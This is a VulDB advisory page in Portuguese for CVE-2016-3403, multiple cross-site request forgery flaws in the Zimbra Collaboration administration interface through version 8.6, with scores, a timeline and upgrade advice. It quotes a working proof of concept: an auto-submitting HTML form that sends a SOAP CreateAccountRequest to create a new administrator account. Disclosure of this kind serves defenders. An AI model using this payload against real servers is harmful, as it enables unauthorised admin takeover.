VDB-95285 · CVE-2016-3403 · BID 95383

Synacor Zimbra Collaboration até 8.6 Administration Interface Falsificação de Pedido entre Sites

CVSS Meta Pontuação TemporáriaPreço atual do exploit (≈)Nota de Interesse CTI
6.3$0-$5k0.00

Sumárioinformação

Uma vulnerabilidade foi encontrada em Synacor Zimbra Collaboration até 8.6. Foi classificada como problemático. Afetado é uma função desconhecida do componente Administration Interface. O tratamento leva a Falsificação de Pedido entre Sites. Esta vulnerabilidade é conhecida como CVE-2016-3403. É possível lançar o ataque remotamente. Além disso, existe um exploit disponível. Recomenda-se a actualização do componente afectado.

Detalhesinformação

Uma vulnerabilidade foi encontrada em Synacor Zimbra Collaboration até 8.6. Foi classificada como problemático. Afetado é uma função desconhecida do componente Administration Interface. O tratamento leva a Falsificação de Pedido entre Sites. Usar CWE para declarar o problema leva a CWE-352. A vulnerabilidade foi identificada em 11/01/2017. O problema foi divulgado 11/01/2017 por Anthony Laou-Hine Tsuei com Sysdream Labs como [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration interface - all versions como Mailinglist Post (Full-Disclosure). O comunicado está disponível para download em seclists.org. A divulgação pública foi coordenada em cooperação com o vendedor.

Esta vulnerabilidade é conhecida como CVE-2016-3403. A atribuição do CVE ocorreu em 17/03/2016. É possível lançar o ataque remotamente. Não há detalhes técnicos disponíveis. A popularidade desta vulnerabilidade está abaixo da média. Além disso, existe um exploit disponível. O exploit foi divulgado ao público e pode ser utilizado. Atualmente, o preço atual de um exploit pode ser aproximadamente USD $0-$5k no momento. O comunicado destaca:

Multiple CSRF vulnerabilities have been found in the administration interface of Zimbra, giving possibilities like adding, modifying and removing admin accounts.

Está declarado como prova de conceito. É possível descarregar a exploração em seclists.org. A vulnerabilidade ficou classificada como zero-day não pública por no mínimo 322 dias. Como 0 dia, o preço estimado do subsolo foi de cerca de $0-$5k. O código usado pelo exploit é:

<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest";
method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope";><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks () ubuntu fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'


        value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

A actualização para a versão 8.7 é capaz de abordar esta questão. Recomenda-se a actualização do componente afectado.

A vulnerabilidade está também documentada noutras bases de dados de vulnerabilidade: SecurityFocus (BID 95383).

Produtoinformação

Tipo

Fabricante

Nome

Versão

Licença

Site

CPE 2.3informação

CPE 2.2informação

CVSSv4informação

VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

CVSSv3informação

VulDB Meta Pontuação Base: 6.6
VulDB Meta Pontuação Temporária: 6.4

VulDB Pontuação Base: 4.3
VulDB Pontuação Temporária: 3.9
VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

NVD Pontuação Base: 8.8
NVD Vetor: 🔍

CVSSv2informação

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexidadeAutenticaçãoConfidencialidadeIntegridadeDisponibilidade
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear

VulDB Pontuação Base: 🔍
VulDB Pontuação Temporária: 🔍
VulDB Fiabilidade: 🔍

NVD Pontuação Base: 🔍

Exploraçãoinformação

Classe: Falsificação de Pedido entre Sites
CWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍

Físico: Não
Local: Não
Remoto: Sim

Disponibilidade: 🔍
Acesso: Público
Estado: Prova de conceito
Autor: Anthony Laou-Hine Tsuei
Linguagem de programação: 🔍
Descarregar: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Tendência de preços: 🔍
Estimativa de preço atual: 🔍

0-DayDesbloquearDesbloquearDesbloquearDesbloquear
HojeDesbloquearDesbloquearDesbloquearDesbloquear

Inteligência de ameaçasinformação

Interesse: 🔍
Atores ativos: 🔍
Grupos APT ativos: 🔍

Contramedidasinformação

Recomendação: Atualização
Estado: 🔍

Tempo 0-dia: 🔍
Tempo de atraso de exploração: 🔍

Atualização: Zimbra Collaboration 8.7

Linha do tempoinformação

24/02/2016 🔍
24/02/2016 +0 dias 🔍
17/03/2016 +22 dias 🔍
11/01/2017 +300 dias 🔍
11/01/2017 +0 dias 🔍
11/01/2017 +0 dias 🔍
11/01/2017 +0 dias 🔍
13/01/2017 +2 dias 🔍
17/05/2017 +124 dias 🔍
28/10/2022 +1990 dias 🔍

Fontesinformação

Fabricante: synacor.com

Aconselhamento: [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration interface - all versions
Pessoa: Anthony Laou-Hine Tsuei
Empresa: Sysdream Labs
Estado: Confirmado
Confirmação: 🔍
Coordenado: 🔍

CVE: CVE-2016-3403 (🔍)
GCVE (CVE): GCVE-0-2016-3403
GCVE (VulDB): GCVE-100-95285
SecurityFocus: 95383 - Zimbra CVE-2016-3403 Multiple Cross Site Request Forgery Vulnerabilities

scip Labs: https://www.scip.ch/en/?labs.20161013

Entradainformação

Criado: 13/01/2017 12h13
Atualizado: 28/10/2022 15h00
Ajustamentos: 13/01/2017 12h13 (76), 03/02/2020 17h44 (4), 28/10/2022 15h00 (3)
Completo: 🔍
Cache ID: 216:FB6:103

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Discussão

Ainda sem comentários. Idiomas: pt + es + en.

Por favor, inicie sessão para comentar.

VoltarVisão GeralPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!